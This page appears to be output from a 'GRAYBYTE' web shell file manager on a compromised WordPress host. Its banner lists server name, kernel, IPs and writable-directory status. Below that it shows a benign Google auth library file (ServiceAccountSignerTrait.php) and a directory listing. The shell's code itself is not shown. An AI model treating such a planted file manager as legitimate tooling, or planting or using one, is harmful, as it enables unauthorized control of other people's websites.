✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ webm004.cluster127.gra.hosting.ovh.net ​🇻​♯➤ 6.18.42-ovh-vps-grsec-zfs+ #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 54.36.91.62 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.7
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ _dyuweyrj4,_dyuweyrj4r,dl

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/docteuh/www/runtime-data-wp-resources/AuthHandler/auth/src//ServiceAccountSignerTrait.php
<?php

/*
 * Copyright 2019 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
namespace Google\Site_Kit_Dependencies\Google\Auth;

use Google\Site_Kit_Dependencies\phpseclib\Crypt\RSA;
/**
 * Sign a string using a Service Account private key.
 */
trait ServiceAccountSignerTrait
{
    /**
     * Sign a string using the service account private key.
     *
     * @param string $stringToSign
     * @param bool $forceOpenssl Whether to use OpenSSL regardless of
     *        whether phpseclib is installed. **Defaults to** `false`.
     * @return string
     */
    public function signBlob($stringToSign, $forceOpenssl = \false)
    {
        $privateKey = $this->auth->getSigningKey();
        $signedString = '';
        if (\class_exists('Google\\Site_Kit_Dependencies\\phpseclib\\Crypt\\RSA') && !$forceOpenssl) {
            $rsa = new \Google\Site_Kit_Dependencies\phpseclib\Crypt\RSA();
            $rsa->loadKey($privateKey);
            $rsa->setSignatureMode(\Google\Site_Kit_Dependencies\phpseclib\Crypt\RSA::SIGNATURE_PKCS1);
            $rsa->setHash('sha256');
            $signedString = $rsa->sign($stringToSign);
        } elseif (\extension_loaded('openssl')) {
            \openssl_sign($stringToSign, $signedString, $privateKey, 'sha256WithRSAEncryption');
        } else {
            // @codeCoverageIgnoreStart
            throw new \RuntimeException('OpenSSL is not installed.');
        }
        // @codeCoverageIgnoreEnd
        return \base64_encode($signedString);
    }
}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
10 Sep 2026 5.30 AM
docteuh / users
0755
Cache
--
10 Sep 2026 5.30 AM
docteuh / users
0755
Credentials
--
10 Sep 2026 5.30 AM
docteuh / users
0755
HttpHandler
--
10 Sep 2026 5.30 AM
docteuh / users
0755
Middleware
--
10 Sep 2026 5.30 AM
docteuh / users
0755
Subscriber
--
10 Sep 2026 5.30 AM
docteuh / users
0755
AccessToken.php
18.07 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
ApplicationDefaultCredentials.php
14.214 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
CacheTrait.php
2.143 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
CredentialsLoader.php
10.482 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
FetchAuthTokenCache.php
8.516 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
FetchAuthTokenInterface.php
1.632 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
GCECache.php
2.601 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
GetQuotaProjectInterface.php
0.952 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
Iam.php
3.274 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
OAuth2.php
35.984 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
ProjectIdProviderInterface.php
0.968 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
ServiceAccountSignerTrait.php
1.979 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
SignBlobInterface.php
1.564 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
UpdateMetadataInterface.php
1.2 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
icon-redirect-manager-20260827192224-20260828192654.svg
1.299 KB
23 Jun 2026 6.19 PM
docteuh / users
0644
icon-redirect-manager-20260827192224.svg
1.299 KB
23 Jun 2026 6.19 PM
docteuh / users
0644
icon-redirect-manager.svg
1.299 KB
23 Jun 2026 6.19 PM
docteuh / users
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF